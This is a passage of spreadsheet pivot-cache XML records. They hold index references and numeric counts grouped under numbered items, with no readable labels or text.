    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="40"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1450"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1451"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1452"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1453"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="5"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1454"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="20"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1455"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1456"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="645"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="645"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="645"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="645"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="645"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="7"/>
    <x v="1457"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="11"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1458"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="518"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="33"/>
    <x v="518"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1459"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1460"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1461"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1462"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1463"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="1444"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="11"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1464"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1465"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1466"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1467"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="8"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="63"/>
    <x v="449"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="47"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="382"/>
    <x v="449"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
